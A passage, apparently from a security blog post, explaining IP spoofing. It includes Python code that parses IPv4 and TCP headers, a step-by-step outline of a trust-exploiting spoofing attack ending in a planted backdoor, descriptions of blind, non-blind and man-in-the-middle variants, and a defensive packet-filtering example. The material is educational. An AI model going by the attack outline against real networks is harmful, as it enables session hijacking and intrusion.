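TCP_FLAG_NAMES = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def dotted(raw4):
    """Render four raw address bytes as dotted-quad text."""
    return ".".join(str(b) for b in raw4)


def parse_ipv4_header(buf):
    """Bytes 0-11 carry version, lengths, ID, fragmentation, TTL, protocol and checksum;
    bytes 12-15 are the source address and 16-19 the destination address."""
    (version_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", buf[:20])
    return {
        "version": version_ihl >> 4,
        "header_len": (version_ihl & 0x0F) * 4,   # IHL is counted in 32-bit words
        "total_len": total_len,
        "ttl": ttl,
        "protocol": proto,                          # 6 = TCP
        "src": dotted(src),
        "dst": dotted(dst),
    }


def parse_tcp_header(buf):
    """The first 12 bytes: source port, destination port, sequence number and
    acknowledgement number. Byte 12 holds the data offset, byte 13 the flags."""
    sport, dport, seq, ack = struct.unpack("!HHII", buf[:12])
    return {
        "sport": sport,
        "dport": dport,
        "seq": seq,
        "ack": ack,
        "header_len": (buf[12] >> 4) * 4,
        "flags": [name for bit, name in TCP_FLAG_NAMES if buf[13] & bit],
    }


def parse_packet(pkt):
    """Parse the IP header, then the TCP header that follows it when the protocol is TCP."""
    ip = parse_ipv4_header(pkt)
    tcp = parse_tcp_header(pkt[ip["header_len"]:]) if ip["protocol"] == 6 else None
    return ip, tcp
```

Nothing in either header authenticates the source address: it is eight bytes of plain data at a fixed offset, which is exactly why the text says it can be rewritten with ordinary tools, and why the filtering checks later in the post have to be done by the network rather than trusted from the packet itself.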

Obviously, it's very easy to mask a source address by manipulating an IP header. This technique is used for obvious reasons and is employed in several of the attacks discussed below. Another consequence, specific to TCP, is sequence number prediction, which can lead to session hijacking or host impersonation.

IP spoofing in brief consists of several interim steps:

• Selecting a target host (or victim).

• The trust relationships are reviewed to identify a host that has a "trust" relationship with the target host.

• The trusted host is then disabled and the target's TCP sequence numbers are sampled.

• The trusted host is then impersonated, the sequence numbers forged (after being calculated).

• A connection attempt is made to a service that only requires address-based authentication (no user ID or password).

• If a successful connection is made, the attacker executes a simple command to leave a backdoor.

Some Common IP spoofing Attacks

Blind spoofing

This is the most sophisticated attack, in which the sequence and acknowledgement numbers have to be worked out without seeing them. The attacker sends packets to the victim in order to examine the pattern of its sequence numbers. Modern operating systems use random sequence number generation, which makes it very difficult to analyse the sequence and acknowledgement numbers this way.



Non- Blind spoofing

This type of spoofing attack can be performed when both the victim and the attacker are on the same subnet. The attacker then has an advantage, as the acknowledgement and sequence numbers can be sniffed, and the hard work of calculating and analysing them manually is removed.



Man In the Middle Attack

This attack is well understood from its name itself. Two trusted parties are involved in a communication, and the attacker spoofs the identity of one of them. The attacker then controls the flow of communication between the two trusted parties and can even fool the recipient into giving up confidential information. The attacker can also manipulate the data being transferred between the two.



Countermeasures to IP spoofing

The countermeasures to spoofing will depend on the type of attack and the network setup. Still, some basic measures that can be implemented to prevent IP spoofing attacks are encrypted authentication, packet filtering at the router and application-based authentication.

IP Spoofing is a problem without an easy solution, since it’s inherent to the design of the TCP/IP suite. Understanding how and why spoofing attacks are used, combined with a few simple prevention methods, can help protect your network from these malicious cloaking and cracking techniques.
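Packet filtering at the router, mentioned among the countermeasures above, usually means ingress and egress filtering: drop any packet whose source address could not legitimately have arrived on the interface it came in on. The added example below, not from the post, models that check in Python for a constructed three-interface router; the interface names, the prefixes behind them (192.168.0.0/24 for the LAN, the 203.0.113.0/24 documentation range standing in for a DMZ) and the sample packets are all assumptions for the illustration.

```python
import ipaddress

# Constructed router: each interface and the source prefixes that may legitimately
# originate traffic behind it. wan0 faces the Internet, so no internal prefix
# should ever appear as a source address on packets arriving there.
INTERFACES = {
    "lan0": [ipaddress.ip_network("192.168.0.0/24")],
    "dmz0": [ipaddress.ip_network("203.0.113.0/24")],
    "wan0": [],
}
INTERNAL_PREFIXES = [net for nets in INTERFACES.values() for net in nets]


def check_source(iface, src):
    """Return ("accept" or "drop", reason) for a packet with source src seen on iface."""
    src = ipaddress.ip_address(src)
    if iface == "wan0":
        # Ingress filtering: an outside packet claiming an inside address is forged.
        if any(src in net for net in INTERNAL_PREFIXES):
            return ("drop", "internal source address arriving from the Internet")
        # Bogons: loopback, RFC 1918, link-local and reserved space are never valid on the wire.
        if src.is_private or src.is_loopback or src.is_link_local or src.is_reserved:
            return ("drop", "bogon source address")
        return ("accept", "")
    # Egress filtering (BCP 38): an inside host may only use the prefix assigned to its
    # segment, so a spoofed packet cannot leave the network in the first place.
    if not any(src in net for net in INTERFACES[iface]):
        return ("drop", "source address not assigned to " + iface)
    return ("accept", "")


# Constructed packet records: (arriving interface, source address, destination address).
SAMPLE_PACKETS = [
    ("wan0", "93.184.216.34", "203.0.113.10"),   # ordinary inbound traffic to the DMZ
    ("wan0", "192.168.0.77", "203.0.113.10"),    # outside packet impersonating a LAN host
    ("wan0", "10.1.2.3", "203.0.113.10"),        # RFC 1918 source arriving from the Internet
    ("lan0", "192.168.0.10", "93.184.216.34"),   # normal outbound traffic
    ("lan0", "203.0.113.9", "93.184.216.34"),    # LAN host forging a DMZ address
]


def filter_packets(packets):
    """Apply check_source to each record; returns (iface, src, verdict, reason) tuples."""
    return [(iface, src) + check_source(iface, src) for iface, src, _dst in packets]


def dropped(packets):
    """Just the (iface, src) pairs the filter rejects."""
    return [(iface, src) for iface, src, verdict, _ in filter_packets(packets) if verdict == "drop"]
```

The two directions matter for different reasons: the wan0 rule protects your own hosts from the trusted-address impersonation described in the attack steps, while the per-segment rule on the inside interfaces stops your network from being the origin of spoofed traffic aimed at somebody else, which is what blind spoofing relies on.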



Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

 